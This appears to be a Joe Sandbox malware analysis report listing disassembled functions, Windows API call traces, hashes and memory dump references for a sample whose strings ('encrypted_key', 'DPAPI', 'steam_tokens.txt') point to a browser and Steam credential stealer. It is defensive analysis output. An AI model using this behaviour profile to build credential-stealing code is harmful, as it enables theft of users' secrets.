                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                  • String ID:
                                  • API String ID: 1008454911-0
                                  • Opcode ID: 9ae5a0f231bb97c12b145ce47385dbf7c40dcbb9018bfee4a3eabeab1c24930f
                                  • Instruction ID: 1195b29d5f59fd33fef833f2667055a69b39cbf64ec9f300b49d40aaf7d385ed
                                  • Opcode Fuzzy Hash: 9ae5a0f231bb97c12b145ce47385dbf7c40dcbb9018bfee4a3eabeab1c24930f
                                  • Instruction Fuzzy Hash: 70418070E00208DFDB28CF95D948BDAB7F5FF48724F248069EA189B294D7759982CF90
                                  Function 00FD4740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00FD4759
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00FD4769
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00FD477B
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FD479C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FD47AB
                                  • CloseHandle.KERNEL32(00000000), ref: 00FD47B2
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00FD47C0
                                  • CloseHandle.KERNEL32(00000000), ref: 00FD47CB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: ada632cb7ca8d37212fda329ca3d240a479547ee0697307354be6844ac686d1c
                                  • Instruction ID: c0c89b47773a576bb160690a9e245a0e4c594d0d189bb79f9292291fb72aa44f
                                  • Opcode Fuzzy Hash: ada632cb7ca8d37212fda329ca3d240a479547ee0697307354be6844ac686d1c
                                  • Instruction Fuzzy Hash: 7A01B9719012186BE7349BF09C89FEE7BFDEB44765F0401A1FA15D5184DB709DC08B61
                                  Function 00FC83E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00FC8435
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC846C
                                  • lstrlen.KERNEL32(00000000), ref: 00FC84B2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC84E9
                                  • lstrlen.KERNEL32(00000000), ref: 00FC84FF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC852E
                                  • StrCmpCA.SHLWAPI(00000000,00FE4C3C), ref: 00FC853E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 1bf444b92114b9229b3f23c6d3abcbe3d6fbc5eb0112e9cb2672619b5df6468b
                                  • Instruction ID: 2184ed8cd00d7c752663050ea452c125c47c3b289c0fa61f91ef8bf8239ab08b
                                  • Opcode Fuzzy Hash: 1bf444b92114b9229b3f23c6d3abcbe3d6fbc5eb0112e9cb2672619b5df6468b
                                  • Instruction Fuzzy Hash: 6351BE719002068FCB24DF68C985F9AB7F8EF48360F18886DEC55DB309EB75E9429B50
                                  Function 00FD2910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00FD2925
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD292C
                                  • RegOpenKeyExA.ADVAPI32(80000002,01B8C2B0,00000000,00020119,00FD28A9), ref: 00FD294B
                                  • RegQueryValueExA.ADVAPI32(00FD28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00FD2965
                                  • RegCloseKey.ADVAPI32(00FD28A9), ref: 00FD296F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: 9ef77e94170a2ec2a1dab65df9ee203e89f4ef20fe73351417150ec10d2cce7a
                                  • Instruction ID: 55eac90a15f0af330bbd5caa1f5112900fa100f1754b25393d3af2b9a8238ea0
                                  • Opcode Fuzzy Hash: 9ef77e94170a2ec2a1dab65df9ee203e89f4ef20fe73351417150ec10d2cce7a
                                  • Instruction Fuzzy Hash: 1401F174A00218ABD324CBE09858EEB7BFCEB48725F140068FE449B244E63059448790
                                  Function 00FD2880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00FD2895
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD289C
                                    • Part of subcall function 00FD2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00FD2925
                                    • Part of subcall function 00FD2910: RtlAllocateHeap.NTDLL(00000000), ref: 00FD292C
                                    • Part of subcall function 00FD2910: RegOpenKeyExA.ADVAPI32(80000002,01B8C2B0,00000000,00020119,00FD28A9), ref: 00FD294B
                                    • Part of subcall function 00FD2910: RegQueryValueExA.ADVAPI32(00FD28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00FD2965
                                    • Part of subcall function 00FD2910: RegCloseKey.ADVAPI32(00FD28A9), ref: 00FD296F
                                  • RegOpenKeyExA.ADVAPI32(80000002,01B8C2B0,00000000,00020119,00FC9500), ref: 00FD28D1
                                  • RegQueryValueExA.ADVAPI32(00FC9500,01B9E688,00000000,00000000,00000000,000000FF), ref: 00FD28EC
                                  • RegCloseKey.ADVAPI32(00FC9500), ref: 00FD28F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 595e5a1b74652dda8e38a129606a041457722eb09c222e08063762b33fbabfdf
                                  • Instruction ID: 9c226852020400d2fe84e32a4b98c62a673607ec3a128ede2c4e2f0cf9265d64
                                  • Opcode Fuzzy Hash: 595e5a1b74652dda8e38a129606a041457722eb09c222e08063762b33fbabfdf
                                  • Instruction Fuzzy Hash: B101A271A00208BBDB28DBE4AC49FAA7BBDEB44715F000165FE18DA384D6705A8497E1
                                  Function 00FB71F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 00FB723E
                                  • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00FB7279
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB7280
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00FB72C3
                                  • HeapFree.KERNEL32(00000000), ref: 00FB72CA
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00FB7329
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                  • String ID:
                                  • API String ID: 174687898-0
                                  • Opcode ID: c30d2b938e64d3bff4cc303b02d85b98b925a08d316d64cb0b15b989ce625a2d
                                  • Instruction ID: b6d4f936ac61015719b2248fe181bbac9477e76cb585724b9902ed8d98ebb4ef
                                  • Opcode Fuzzy Hash: c30d2b938e64d3bff4cc303b02d85b98b925a08d316d64cb0b15b989ce625a2d
                                  • Instruction Fuzzy Hash: 6E416E71B057059BDB20DFAAD884BEAB3E8FB84315F1845A9EC5DCB340E631E940AF50
                                  Function 00FB9C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 00FB9CA8
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00FB9CDA
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FB9D03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2746078483-738592651
                                  • Opcode ID: ceef33315f6fe0eb9b00d1735734d13a92f98f6dc182d42b4fb327f42c0495f6
                                  • Instruction ID: 029345dc0cc033f423683a9eaddb338c34c06e542085e8303bc134c4f8e0f79c
                                  • Opcode Fuzzy Hash: ceef33315f6fe0eb9b00d1735734d13a92f98f6dc182d42b4fb327f42c0495f6
                                  • Instruction Fuzzy Hash: 7C41B271E042099BCB21EFA6DC816EE77B4AF94314F044064EA55A7342DB74ED04EF80
                                  Function 00FCE9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00FCEA24
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCEA53
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCEA61
                                  • lstrcat.KERNEL32(?,00FE1794), ref: 00FCEA7A
                                  • lstrcat.KERNEL32(?,01B99278), ref: 00FCEA8D
                                  • lstrcat.KERNEL32(?,00FE1794), ref: 00FCEA9F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 294f14f45973c7049723f5e77b8a8f01840a96f5bdd363eaa1a65736ce641caa
                                  • Instruction ID: 6e76355fc50d9f5c94395b856e971a80cc732b482f85cf0627c6ee836ce9a488
                                  • Opcode Fuzzy Hash: 294f14f45973c7049723f5e77b8a8f01840a96f5bdd363eaa1a65736ce641caa
                                  • Instruction Fuzzy Hash: 1641A9719101199FCB65EFA4DC42FED77B8BF88300F444468B616AB244DB789E84AF90
                                  Function 00FCECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCECDF
                                  • lstrlen.KERNEL32(00000000), ref: 00FCECF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCED1D
                                  • lstrlen.KERNEL32(00000000), ref: 00FCED24
                                  • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 00FCED52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: steam_tokens.txt
                                  • API String ID: 367037083-401951677
                                  • Opcode ID: 707ad9dde531a539b2a94b234f37cfcdcab04a209bc29e9c85366b691a133d54
                                  • Instruction ID: 4a7ce45a553d3e50f6280293f8011c4515157a79d2deddaf4ce85b503fa0ed43
                                  • Opcode Fuzzy Hash: 707ad9dde531a539b2a94b234f37cfcdcab04a209bc29e9c85366b691a133d54
                                  • Instruction Fuzzy Hash: 66319131A101565BC762FFB9ED4AA9E77A9AF40310F040034F846EB202DB2CDC05BBD1
                                  Function 00FB9A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00FB140E), ref: 00FB9A9A
                                  • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00FB140E), ref: 00FB9AB0
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,00FB140E), ref: 00FB9AC7
                                  • ReadFile.KERNEL32(00000000,00000000,?,00FB140E,00000000,?,?,?,00FB140E), ref: 00FB9AE0
                                  • LocalFree.KERNEL32(?,?,?,?,00FB140E), ref: 00FB9B00
                                  • CloseHandle.KERNEL32(00000000,?,?,?,00FB140E), ref: 00FB9B07
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
